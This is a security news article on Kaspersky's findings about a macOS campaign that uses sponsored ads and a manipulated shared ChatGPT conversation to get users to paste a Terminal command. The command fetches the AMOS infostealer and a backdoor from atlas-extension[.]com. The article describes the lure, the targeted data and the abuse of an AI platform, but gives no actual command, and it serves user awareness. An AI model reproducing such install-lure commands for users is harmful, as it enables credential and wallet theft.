Kaspersky Threat Research has identified a new malware campaign targeting macOS users, which uses paid Google search advertisements and shared conversations on the official ChatGPT website to distribute the AMOS (Atomic macOS Stealer) infostealer along with a persistent backdoor.
According to Kaspersky, the attackers purchase sponsored search ads linked to terms such as “chatgpt atlas.” Users clicking on these ads are redirected to a page appearing to be an installation guide for “ChatGPT Atlas for macOS.” While the page is hosted on chatgpt.com and resembles a shared ChatGPT conversation, the content is in fact carefully crafted through prompt engineering to display only step-by-step installation instructions.
The guide instructs users to copy a single line of code, open the Terminal application on macOS, paste the command, and grant all requested permissions. Kaspersky’s analysis shows that this command downloads and executes a malicious script from an external domain, atlas-extension[.]com.
Once executed, the script repeatedly asks for the user’s system password, verifying it by running system-level commands. After obtaining the correct password, the malware downloads and installs the AMOS infostealer, which then begins collecting sensitive data. The infection method is a variation of the “ClickFix” technique, relying on users to manually run shell commands that fetch malicious code from remote servers.
AMOS is designed to harvest information that can be monetized or reused in further attacks. It targets passwords and cookies from popular web browsers, cryptocurrency wallets such as Electrum, Coinomi, and Exodus, as well as applications including Telegram Desktop and OpenVPN Connect. The malware also scans files in Desktop, Documents, and Downloads folders, along with notes stored in the macOS Notes app, sending the data to attacker-controlled servers.
In addition to the infostealer, the campaign installs a backdoor that remains active across system reboots. The backdoor provides attackers with remote access and replicates much of AMOS’s data collection.
Kaspersky highlighted that infostealers are among the fastest-growing cyber threats in 2025, with attackers increasingly exploiting AI-related themes, fake AI tools, and AI-generated content to lend credibility to their lures. The Atlas-themed campaign illustrates this trend by abusing a legitimate AI platform’s content-sharing features.
“What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” said Vladimir Gursky, malware analyst at Kaspersky. “A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command. For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”
Kaspersky urged users to exercise caution when following unsolicited guides that require running Terminal or PowerShell commands. Users are advised to verify suspicious instructions, avoid unclear scripts, and ensure that reputable security software is installed and up to date on macOS devices.
Facebook
Twitter
Instagram
LinkedIn
RSS